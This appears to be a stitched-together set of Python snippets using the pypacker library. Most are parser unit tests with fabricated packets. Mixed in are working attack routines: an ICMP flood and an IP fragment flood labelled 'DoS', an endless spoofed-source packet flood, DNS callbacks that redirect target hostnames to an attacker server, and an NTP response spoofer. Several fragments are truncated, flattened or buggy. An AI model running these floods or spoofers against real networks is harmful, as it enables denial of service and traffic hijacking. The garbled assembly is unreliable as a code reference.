def test_radiotap_packet_filter_and_parse_failing_wrong_encapsulation(
marine_or_marine_pool: Union[Marine, MarinePool]
):
src_ip = "78.78.78.255"
dst_ip = "10.0.0.255"
bpf_filter = "ip"
display_filter = "ip"
packet = (
radiotap.Radiotap(present_flags=radiotap.CHANNEL_MASK + radiotap.RATE_MASK)
+ ieee80211.IEEE80211(framectl=0x8801)
+ ieee80211.IEEE80211.Dataframe(sec_param=None)
+ llc.LLC(
dsap=170, ssap=170, ctrl=3, snap=int.to_bytes(llc.LLC_TYPE_IP, 5, "big")
)
+ ip.IP(src_s=src_ip, dst_s=dst_ip)
)
general_filter_and_parse_test(
marine_or_marine_pool=marine_or_marine_pool,
packet=packet.bin(),
packet_encapsulation=encap_consts.ENCAP_ETHERNET,
bpf_filter=bpf_filter,
display_filter=display_filter,
field_templates=None,
expected_passed=False,
expected_output={},
)
def test_tcp_packet_filter_and_parse_with_field_template_with_non_existing_field_first(
marine_or_marine_pool: Union[Marine, MarinePool]
):
src_mac = "00:00:00:12:34:ff"
dst_mac = "00:00:00:ff:00:1e"
src_ip = "21.53.78.255"
dst_ip = "10.0.0.255"
src_port = 16424
dst_port = 41799
bpf_filter = "ip"
display_filter = "tcp"
field_templates = {"macro.ip.src": ["ipv6.src", "ip.src"]}
expected_output = {
"macro.ip.src": src_ip,
}
packet = (
ethernet.Ethernet(src_s=src_mac, dst_s=dst_mac)
+ ip.IP(src_s=src_ip, dst_s=dst_ip)
+ tcp.TCP(sport=src_port, dport=dst_port)
)
general_filter_and_parse_test(
marine_or_marine_pool=marine_or_marine_pool,
packet=packet.bin(),
packet_encapsulation=encap_consts.ENCAP_ETHERNET,
bpf_filter=bpf_filter,
display_filter=display_filter,
field_templates=field_templates,
expected_passed=True,
expected_output=expected_output,
)
def test_radiotap_packet_filter_and_parse_with_auto_encap_in_field_template(
marine_or_marine_pool: Union[Marine, MarinePool]
):
src_ip = "78.78.78.255"
dst_ip = "10.0.0.255"
bpf_filter = "ip"
display_filter = "ip"
field_templates = {"macro.dummy": ["radiotap.present.rate"]}
expected_output = {
"macro.dummy": 1,
"ip.src": src_ip,
"ip.dst": dst_ip,
}
packet = (
radiotap.Radiotap(present_flags=radiotap.CHANNEL_MASK + radiotap.RATE_MASK)
+ ieee80211.IEEE80211(framectl=0x8801)
+ ieee80211.IEEE80211.Dataframe(sec_param=None)
+ llc.LLC(
dsap=170, ssap=170, ctrl=3, snap=int.to_bytes(llc.LLC_TYPE_IP, 5, "big")
)
+ ip.IP(src_s=src_ip, dst_s=dst_ip)
)
general_filter_and_parse_test(
marine_or_marine_pool=marine_or_marine_pool,
packet=packet.bin(),
packet_encapsulation=None,
bpf_filter=bpf_filter,
display_filter=display_filter,
field_templates=field_templates,
expected_passed=True,
expected_output=expected_output,
)
def test_radiotap_packet_filter_and_parse_parsing_wrong_encapsulation(
marine_or_marine_pool: Union[Marine, MarinePool]
):
src_ip = "78.78.78.255"
dst_ip = "10.0.0.255"
expected_output = {
"radiotap.present.tsft": None,
"radiotap.present.channel": None,
"radiotap.present.rate": None,
"wlan.fc.type_subtype": None,
"llc.type": None,
"ip.src": None,
"ip.dst": None,
}
packet = (
radiotap.Radiotap(present_flags=radiotap.CHANNEL_MASK + radiotap.RATE_MASK)
+ ieee80211.IEEE80211(framectl=0x8801)
+ ieee80211.IEEE80211.Dataframe(sec_param=None)
+ llc.LLC(
dsap=170, ssap=170, ctrl=3, snap=int.to_bytes(llc.LLC_TYPE_IP, 5, "big")
)
+ ip.IP(src_s=src_ip, dst_s=dst_ip)
)
general_filter_and_parse_test(
marine_or_marine_pool=marine_or_marine_pool,
packet=packet.bin(),
packet_encapsulation=encap_consts.ENCAP_ETHERNET,
bpf_filter=None,
display_filter=None,
field_templates=None,
expected_passed=True,
expected_output=expected_output,
)
def test_filter_and_parse_without_filters(
marine_or_marine_pool: Union[Marine, MarinePool]
):
src_mac = "00:00:00:12:34:ff"
dst_mac = "00:00:00:ff:00:1e"
src_ip = "21.53.78.255"
dst_ip = "10.0.0.255"
src_port = 16424
dst_port = 41799
expected_output = {
"eth.src": src_mac,
"eth.dst": dst_mac,
"ip.src": src_ip,
"ip.dst": dst_ip,
"tcp.srcport": src_port,
"tcp.dstport": dst_port,
}
packet = (
ethernet.Ethernet(src_s=src_mac, dst_s=dst_mac)
+ ip.IP(src_s=src_ip, dst_s=dst_ip)
+ tcp.TCP(sport=src_port, dport=dst_port)
)
general_filter_and_parse_test(
marine_or_marine_pool=marine_or_marine_pool,
packet=packet.bin(),
packet_encapsulation=encap_consts.ENCAP_ETHERNET,
bpf_filter=None,
display_filter=None,
field_templates=None,
expected_passed=True,
expected_output=expected_output,
)
def tcp_packet(tcp_payload) -> bytes:
packet = (
ethernet.Ethernet(src_s="00:00:00:12:34:ff", dst_s="00:00:00:ff:00:1e")
+ ip.IP(src_s="10.0.0.255", dst_s="21.53.78.255") + tcp.TCP(
sport=16424, dport=41799, flags=tcp.TH_ACK,
body_bytes=tcp_payload))
return packet.bin()
def send(self, payload):
packet = ip.IP(payload)
if packet[ip.IP, tcp.TCP] is not None:
print("[RawSocketSimulator] RAW TCP %s:%s -> %s:%s" % (
packet[ip.IP].src_s,
packet[tcp.TCP].sport,
packet[ip.IP].dst_s,
packet[tcp.TCP].dport,
))
(self.host, self.port) = (
packet[ip.IP].dst_s,
packet[tcp.TCP].dport,
)
# Handle TCP SYN Scan
if packet[tcp.TCP].flags == tcp.TH_SYN:
if self._raw_syn_queue.qsize() < 16:
self._raw_syn_queue.put((
packet[ip.IP].src_s,
packet[ip.IP].dst_s,
packet[tcp.TCP].sport,
packet[tcp.TCP].dport,
packet[tcp.TCP].seq,
))
else:
print("[RawSocketSimulator] Unsupported RAW scan packet:", packet)
def buildtcp():
# Ethernet header
eth = ethernet.Ethernet()
eth.src = b"\x00\x0c\x29\xdf\xe3\xc0"
eth.dst = b"\x00\x0c\x29\x29\x85\xd2"
eth.type = ethernet.ETH_TYPE_IP
# IP header
ipp = ip.IP()
ipp.src = socket.inet_aton("172.16.13.165")
ipp.dst = socket.inet_aton("172.16.13.162")
ipp.p = ip.IP_PROTO_TCP
# TCP header
tcpp = tcp.TCP()
tcpp.sport = 60001
tcpp.dport = 80
tcpp.flags = tcp.TH_SYN
ipp.data = tcpp
ipp.len = len(str(ip))
ipp.id = 1
tcpp._TCP__calc_sum()
ipp._IP__calc_sum()
eth.data = ipp
# open sockets using the socket handler
#sock_l2 = SocketHndl(iface_name="eth1", mode=SocketHndl.MODE_LAYER_2)
# send raw bytes
#sock_l2.send(eth.bin())
#print(eth.bin())
return eth.bin()
def test_icmp_packet_filter_and_parse(marine_or_marine_pool: Union[Marine, MarinePool]):
src_mac = "00:00:00:12:34:ff"
dst_mac = "00:00:00:ff:00:1e"
src_ip = "21.53.78.255"
dst_ip = "10.0.0.255"
icmp_echo_type = 8
bpf_filter = "ip"
display_filter = "icmp"
expected_output = {
"eth.src": src_mac,
"eth.dst": dst_mac,
"ip.src": src_ip,
"ip.dst": dst_ip,
"icmp.type": icmp_echo_type,
}
packet = (
ethernet.Ethernet(src_s=src_mac, dst_s=dst_mac)
+ ip.IP(src_s=src_ip, dst_s=dst_ip, p=ip.IP_PROTO_ICMP)
+ icmp.ICMP(type=icmp_echo_type)
+ icmp.ICMP.Echo()
)
general_filter_and_parse_test(
marine_or_marine_pool=marine_or_marine_pool,
packet=packet.bin(),
packet_encapsulation=encap_consts.ENCAP_ETHERNET,
bpf_filter=bpf_filter,
display_filter=display_filter,
field_templates=None,
expected_passed=True,
expected_output=expected_output,
)
def _generate_zero_pkt(self, src_ip, src_port, dst_ip, dst_port, proto):
assert proto == 6
zp = ethernet.Ethernet() + ip.IP(src_s=src_ip, dst_s=dst_ip) + tcp.TCP(
sport=src_port,
dport=dst_port,
flags=24,
body_bytes=bytearray(self.zpp))
return zp.bin()
def _make_syn_ack_packet(self, saddr, daddr, sport, dport, seq):
packet = ip.IP(src_s=saddr, dst_s=daddr) + tcp.TCP(
dport=dport,
sport=sport,
seq=seq,
ack=seq + 1,
flags=tcp.TH_SYN | tcp.TH_ACK,
)
return packet.bin()
def poll(self, timeout):
events = self.poller.poll(timeout)
if events: # lists are true iff. they are non-empty
# FIXME properly read the (fd, event) tuple, iterate list
data = self.tun.read(self.tun.mtu)
#sys.stdout.buffer.write(data)
pack = ip.IP(data)
return {"IP": pack.dst, "payload": data}
else:
return None
def _create_udp_base_packets(
conversation: Layer3Conversation) -> Tuple[Packet, Packet]:
src_port, dst_port = _generate_port(), _generate_port()
base_src_to_dst = (ethernet.Ethernet(
src_s=conversation.src_mac,
dst_s=conversation.dst_mac,
type=ethernet.ETH_TYPE_IP,
) + ip.IP(p=ip.IP_PROTO_UDP,
src_s=conversation.src_ip,
dst_s=conversation.dst_ip) +
udp.UDP(sport=src_port, dport=dst_port))
base_dst_to_src = (ethernet.Ethernet(
src_s=conversation.dst_mac,
dst_s=conversation.src_mac,
type=ethernet.ETH_TYPE_IP,
) + ip.IP(p=ip.IP_PROTO_UDP,
src_s=conversation.dst_ip,
dst_s=conversation.src_ip) +
udp.UDP(sport=dst_port, dport=src_port))
return base_src_to_dst, base_dst_to_src
def send_pkt(pkt_num):
ips = []
for i in range(0, pkt_num):
ips.append(str(random.randint(1, 254)) + '.' + str(random.randint(1, 254)) + '.' + str(random.randint(1, 254)) + '.' + str(random.randint(1, 254)))
while True:
for i in range(0, pkt_num):
src_ip = ips[i]
print('src ip : ' + src_ip)
packet_ip = ip.IP(src_s=src_ip, dst_s="192.168.10.1") + tcp.TCP(dport=8888)
psock = psocket.SocketHndl(mode=psocket.SocketHndl.MODE_LAYER_3, timeout=10)
psock.send(packet_ip.bin(), dst=packet_ip.dst_s)
time.sleep(0.001)
psock.close()
def handle_pkt(pkt):
ip1 = ip.IP(pkt.get_payload())
if dns.DNS in ip1:
dns1 = ip1[dns.DNS]
# this is a query that we would like to rewrite
if (not dns1.answers
and set(q.name_s for q in dns1.queries) & TARGET_HOSTNAMES
and ip1.src[-1] > 240): # only redirect packets from the client net
pkt.set_mark(1234)
print("Marked packet originally destined for", ip1.dst_s)
pkt.accept()
def icmp_cb(pargs):
"""ICMP DoS"""
pkt_icmpreq = ethernet.Ethernet(dst_s=pargs.mac_dst, src_s=pargs.mac_src) +\
ip.IP(src_s=pargs.ip_src, dst_s=pargs.ip_dst, p=ip.IP_PROTO_ICMP) +\
icmp.ICMP(type=8) +\
icmp.ICMP.Echo(id=1, ts=123456789, body_bytes=b"A" * 1460)
psock = psocket.SocketHndl(iface_name=pargs.iface_name)
for cnt in range(pargs.count):
psock.send(pkt_icmpreq.bin())
psock.close()
def verdict_cb(ll_data, ll_proto_id, data, ctx):
ip1 = ip.IP(data)
if dns.DNS in ip1:
dns1 = ip1[dns.DNS]
for answer in dns1.answers:
if answer.type == dns.DNS_A and answer.name_s in TARGET_HOSTNAMES:
print("Modified a DNS response for", answer.name_s)
answer.address = OUR_SERVER
# force recalculation of UDP checksum, seems to be a bug in pypacker
ip1[udp.UDP]._calc_sum()
return ip1.bin(True), interceptor.NF_ACCEPT
def poll(self, timeout):
logging.debug('Checking for packets on TUN...')
events = self.poller.poll(timeout)
if events: # lists are true iff. they are non-empty
# FIXME properly read the (fd, event) tuple, iterate list
logging.debug("Select poller reports TUN is readable...")
data = self.tun.read(self.tun.mtu)
logging.debug("Incoming packets on TUN...")
#sys.stdout.buffer.write(data)
pack = ip.IP(data)
return {"IP": pack.dst, "payload": data}
else:
logging.debug("No packets from TUN.")
return None
def test_dhcp_packet_filter_and_parse(marine_or_marine_pool: Union[Marine, MarinePool]):
src_mac = "00:00:00:12:34:ff"
dst_mac = "00:00:00:ff:00:1e"
src_ip = "21.53.78.255"
given_ip = "10.0.0.255"
broadcast_ip = "255.255.255.255"
src_port = 16424
dst_port = 68
bpf_filter = "ip"
display_filter = "dhcp"
expected_output = {
"eth.src": src_mac,
"eth.dst": dst_mac,
"ip.src": src_ip,
"ip.dst": broadcast_ip,
"udp.srcport": src_port,
"udp.dstport": dst_port,
"dhcp.ip.your": given_ip,
"dhcp.option.dhcp_server_id": src_ip,
}
packet = (
ethernet.Ethernet(src_s=src_mac, dst_s=dst_mac)
+ ip.IP(src_s=src_ip, dst_s=broadcast_ip, p=ip.IP_PROTO_UDP)
+ udp.UDP(sport=src_port, dport=dst_port)
+ dhcp.DHCP(
yiaddr_s=given_ip,
magic=dhcp.DHCP_MAGIC,
opts=[
dhcp.DHCPOpt(
type=dhcp.DHCP_OPT_SERVER_ID,
len=4,
body_bytes=bytes(int(num) for num in src_ip.split(".")),
)
],
)
)
general_filter_and_parse_test(
marine_or_marine_pool=marine_or_marine_pool,
packet=packet.bin(),
packet_encapsulation=encap_consts.ENCAP_ETHERNET,
bpf_filter=bpf_filter,
display_filter=display_filter,
field_templates=None,
expected_passed=True,
expected_output=expected_output,
)
def verdict_cb(data, ll_proto_id, ctx):
ip1 = ip.IP(data)
icmp1 = ip1[icmp.ICMP]
if icmp1 is None or icmp1.type != icmp.ICMP_TYPE_ECHO_REQ:
return data, interceptor.NF_ACCEPT
echo1 = icmp1[icmp.ICMP.Echo]
if echo1 is None:
return data, interceptor.NF_ACCEPT
pp_bts = b"PYPACKER"
print("changing ICMP echo request packet")
echo1.body_bytes = echo1.body_bytes[:len(pp_bts)] + pp_bts
return ip1.bin(), interceptor.NF_ACCEPT
def ip_cb(pargs):
"""
IP fragment DOS
"""
eth_l = ethernet.Ethernet(dst_s=pargs.mac_dst, src_s=pargs.mac_src)
ip_l = ip.IP(src_s=pargs.ip_src, dst_s=pargs.ip_dst)
ip_l.body_bytes = b"A" * 4000
psock = psocket.SocketHndl(iface_name=pargs.iface_name)
ip_frags = ip_l.create_fragments(fragment_len=8)
for cnt in range(pargs.count):
for ip_frag in ip_frags:
eth_l.upper_layer = ip_frag
psock.send(eth_l.bin())
psock.close()
def test_http_packet_filter_and_parse(marine_or_marine_pool: Union[Marine, MarinePool]):
src_mac = "00:00:00:12:34:ff"
dst_mac = "00:00:00:ff:00:1e"
src_ip = "21.53.78.255"
dst_ip = "10.0.0.255"
src_port = 16424
dst_port = 80
http_type = "GET"
uri = "/subtest/subsubtest"
version = "HTTP/1.1"
domain_name = "www.testwebsite.com"
body = "random body \x09\xff\x00"
bpf_filter = "ip"
display_filter = "http"
expected_output = {
"eth.src": src_mac,
"eth.dst": dst_mac,
"ip.src": src_ip,
"ip.dst": dst_ip,
"tcp.srcport": src_port,
"tcp.dstport": dst_port,
"http.request.method": http_type,
"http.request.uri": uri,
"http.request.version": version,
"http.host": domain_name,
}
packet = (
ethernet.Ethernet(src_s=src_mac, dst_s=dst_mac)
+ ip.IP(src_s=src_ip, dst_s=dst_ip)
+ tcp.TCP(sport=src_port, dport=dst_port)
+ http.HTTP(
f"{http_type} {uri} {version}\r\nHost: {domain_name}\r\n\r\n{body}\r\n".encode()
)
)
general_filter_and_parse_test(
marine_or_marine_pool=marine_or_marine_pool,
packet=packet.bin(),
packet_encapsulation=encap_consts.ENCAP_ETHERNET,
bpf_filter=bpf_filter,
display_filter=display_filter,
field_templates=None,
expected_passed=True,
expected_output=expected_output,
)
def verdict_cb(ll_data, ll_proto_id, data, ctx, *args):
print("got data")
ip1 = ip.IP(data)
icmp1 = ip1[icmp.ICMP]
if icmp1 is None or icmp1.type != icmp.ICMP_ECHO:
return data, interceptor.NF_ACCEPT
echo1 = icmp1[icmp.ICMP.Echo]
if echo1 is None:
return data, interceptor.NF_ACCEPT
pp_bts = b"PYPACKER"
print("ICMP Found")
#print("changing ICMP echo request packet")
#echo1.body_bytes = echo1.body_bytes[:len(pp_bts)] + pp_bts
return ip1.bin(), interceptor.NF_ACCEPT
def read_write_cycler(obj, iface_in, iface_out, name):
while obj._state_active:
try:
bts = iface_in.read()
try:
ip.IP(
bts
) if obj._ifacetype == TYPE_TUN else ethernet.Ethernet(bts)
#logger.debug("Sending in cycler %s (%s -> %s):\n%s\n%s" %
# (name, iface_in._iface_name, iface_out._iface_name, bts, pkt))
iface_out.write(bts)
except:
pass
except ValueError as ex:
logger.exception(ex)
break
except OSError as ex:
logger.exception(ex)
break
except Exception as ex:
logger.exception(ex)
break
def test_dns_packet_filter_and_parse(marine_or_marine_pool: Union[Marine, MarinePool]):
src_mac = "00:00:00:12:34:ff"
dst_mac = "00:00:00:ff:00:1e"
src_ip = "21.53.78.255"
dst_ip = "10.0.0.255"
src_port = 16424
dst_port = 53
bpf_filter = "ip"
display_filter = "dns"
domain_name = "www.testwebsite.com"
expected_output = {
"eth.src": src_mac,
"eth.dst": dst_mac,
"ip.src": src_ip,
"ip.dst": dst_ip,
"udp.srcport": src_port,
"udp.dstport": dst_port,
"dns.qry.name": domain_name,
}
packet = (
ethernet.Ethernet(src_s=src_mac, dst_s=dst_mac)
+ ip.IP(src_s=src_ip, dst_s=dst_ip, p=ip.IP_PROTO_UDP)
+ udp.UDP(sport=src_port, dport=dst_port)
+ dns.DNS(queries=[dns.DNS.Query(name_s=domain_name, type=1, cls=1)])
)
general_filter_and_parse_test(
marine_or_marine_pool=marine_or_marine_pool,
packet=packet.bin(),
packet_encapsulation=encap_consts.ENCAP_ETHERNET,
bpf_filter=bpf_filter,
display_filter=display_filter,
field_templates=None,
expected_passed=True,
expected_output=expected_output,
)
from pypacker import psocket from pypacker.layer12 import ethernet from pypacker.layer3 import ip, icmp # send ICMP request psock = psocket.SocketHndl(iface_name="wlan0") icmpreq = ethernet.Ethernet(src_s="20:16:d8:ef:1f:49", dst_s="24:65:11:85:e9:00", type=ethernet.ETH_TYPE_IP) +\ ip.IP(p=ip.IP_PROTO_ICMP, src_s="192.168.178.27", dst_s="192.168.178.24") +\ icmp.ICMP(type=8) +\ icmp.ICMP.Echo(id=1, ts=123456789, body_bytes=b"12345678901234567890") psock.send(icmpreq.bin())
# psock_req.close()
#
# spoof NTP response
#
print("waiting for NTP request")
psock = psocket.SocketHndl(iface_name=IFACE, timeout=600)
filter = lambda p: p[ntp.NTP] is not None and p[ip.IP].src_s == IP_SRC
answer = psock.recvp(filter_match_recv=filter)[0]
answer_ntp = answer[ntp.NTP]
print("got NTP packet: %s" % answer_ntp)
ntp_answer_send = Ethernet(dst=answer[Ethernet].src, src=answer[Ethernet].dst) +\
ip.IP(src=answer[ip.IP].dst, dst_s=IP_SRC, p=ip.IP_PROTO_UDP) +\
UDP(sport=answer[UDP].dport, dport=answer[UDP].sport) +\
ntp.NTP(li=ntp.NO_WARNING, v=3, mode=ntp.SERVER, stratum=2, interval=4,
update_time=answer_ntp.transmit_time,
originate_time=answer_ntp.transmit_time,
receive_time=b"\x00" * 4 + answer_ntp.transmit_time[4:],
transmit_time=b"\x00" * 4 + answer_ntp.transmit_time[4:])
# alternative packet creation
"""
ntp_answer_send = answer.create_reverse()
layer_ntp = ntp_answer_send[ntp.NTP]
layer_ntp.mode = ntp.SERVER
layer_ntp.originate_time = answer_ntp.transmit_time
layer_ntp.receive_time = layer_ntp.transmit_time = b"\x00"*4 + answer_ntp.transmit_time[4:]
"""
direction = pypacker.Packet.DIR_UNKNOWN
return direction
def reverse_address(self):
"""
reverse_address(...) should be overwritten to be able to reverse
source/destination addresses (see ethernet.Ethernet)
"""
self.src, self.dst = self.dst, self.src
# Parse from raw bytes
# First layer (Layer 2)
newproto_bytes = b"\x66" + b"AAAA" + b"BBBB" + b"\x00\x16" + b"\x00" + b"1234" + b"\x00A\x01B\x02C"
# Next upper layer (Layer 3)
ip_bytes = ip.IP().bin()
# Layer above upper layer (Layer 4)
tcp_bytes = tcp.TCP().bin()
newproto_pkt = NewProtocol(newproto_bytes + ip_bytes + tcp_bytes)
print()
print(">>> Layers of packet:")
print("Output all layers: %s" % newproto_pkt)
print("Access some fields: 0x%X %s %s" %
(newproto_pkt.type, newproto_pkt.src, newproto_pkt.dst))
print("Access next upper layer (IP): %s" % newproto_pkt.ip)
print("A layer above IP: %s" % newproto_pkt.ip.tcp)
print("Same as above: %s" % newproto_pkt[tcp.TCP])
# Create new Packet by defining every single header and adding higher layers
newproto_pkt = NewProtocol(
def test_tcp_packet_filter_and_parse_with_multiple_different_field_templates(
marine_or_marine_pool: Union[Marine, MarinePool]
):
src_mac = "00:00:00:12:34:ff"
dst_mac = "00:00:00:ff:00:1e"
src_ip = "21.53.78.255"
dst_ip = "10.0.0.255"
src_port = 16424
dst_port = 41799
bpf_filter = "ip"
display_filter = "tcp"
first_field_templates = {
"macro.ip.src": ["ip.src", "ipv6.src"],
"macro.ip.dst": ["ip.dst", "ipv6.dst"],
}
second_field_templates = {
"macro.ip.src": ["ip.src", "ipv6.src"],
"macro.ip.dst": ["ip.dst", "ipv6.dst"],
"macro.srcport": ["tcp.srcport", "udp.srcport"],
"macro.dstport": ["tcp.dstport", "udp.dstport"],
}
third_field_templates = {
"macro.ip.src": ["ip.src", "ipv6.src"],
"macro.ip.dst": ["ip.dst", "ipv6.dst"],
"macro.dstport": ["tcp.dstport", "udp.dstport"],
}
first_expected_output = {
"eth.src": src_mac,
"eth.dst": dst_mac,
"macro.ip.src": src_ip,
"macro.ip.dst": dst_ip,
"tcp.srcport": src_port,
"tcp.dstport": dst_port,
}
second_expected_output = {
"eth.src": src_mac,
"eth.dst": dst_mac,
"macro.ip.src": src_ip,
"macro.ip.dst": dst_ip,
"macro.srcport": src_port,
"macro.dstport": dst_port,
}
third_expected_output = {
"eth.src": src_mac,
"eth.dst": dst_mac,
"macro.ip.src": src_ip,
"macro.ip.dst": dst_ip,
"tcp.srcport": src_port,
"macro.dstport": dst_port,
}
packet = (
ethernet.Ethernet(src_s=src_mac, dst_s=dst_mac)
+ ip.IP(src_s=src_ip, dst_s=dst_ip)
+ tcp.TCP(sport=src_port, dport=dst_port)
)
general_filter_and_parse_test(
marine_or_marine_pool=marine_or_marine_pool,
packet=packet.bin(),
packet_encapsulation=encap_consts.ENCAP_ETHERNET,
bpf_filter=bpf_filter,
display_filter=display_filter,
field_templates=first_field_templates,
expected_passed=True,
expected_output=first_expected_output,
)
general_filter_and_parse_test(
marine_or_marine_pool=marine_or_marine_pool,
packet=packet.bin(),
packet_encapsulation=encap_consts.ENCAP_ETHERNET,
bpf_filter=bpf_filter,
display_filter=display_filter,
field_templates=second_field_templates,
expected_passed=True,
expected_output=second_expected_output,
)
general_filter_and_parse_test(
marine_or_marine_pool=marine_or_marine_pool,
packet=packet.bin(),
packet_encapsulation=encap_consts.ENCAP_ETHERNET,
bpf_filter=bpf_filter,
display_filter=display_filter,
field_templates=third_field_templates,
expected_passed=True,
expected_output=third_expected_output,
)
import socket
import pypacker.pypacker as pypacker
from pypacker.pypacker import Packet
from pypacker import psocket
from pypacker.layer12 import arp, ethernet, ieee80211, prism
from pypacker.layer3 import ip, icmp
psock = psocket.SocketHndl(iface_name="lo0",
mode=psocket.SocketHndl.MODE_LAYER_2,
timeout=10)
# send ARP request
arpreq = ethernet.Ethernet(src_s="12:34:56:78:90:12", type=ethernet.ETH_TYPE_ARP) +\
arp.ARP(sha_s="12:34:56:78:90:12", spa_s="192.168.0.2",
tha_s="12:34:56:78:90:13", tpa_s="192.168.0.1")
psock.send(arpreq.bin())
# send ICMP request
icmpreq = ethernet.Ethernet(src_s="12:34:56:78:90:12", dst_s="12:34:56:78:90:13", type=ethernet.ETH_TYPE_IP) +\
ip.IP(p=ip.IP_PROTO_ICMP, src_s="192.168.0.2", dst_s="192.168.0.1") +\
icmp.ICMP(type=8) +\
icmp.ICMP.Echo(id=1, ts=123456789, body_bytes=b"12345678901234567890")
psock.send(icmpreq.bin())
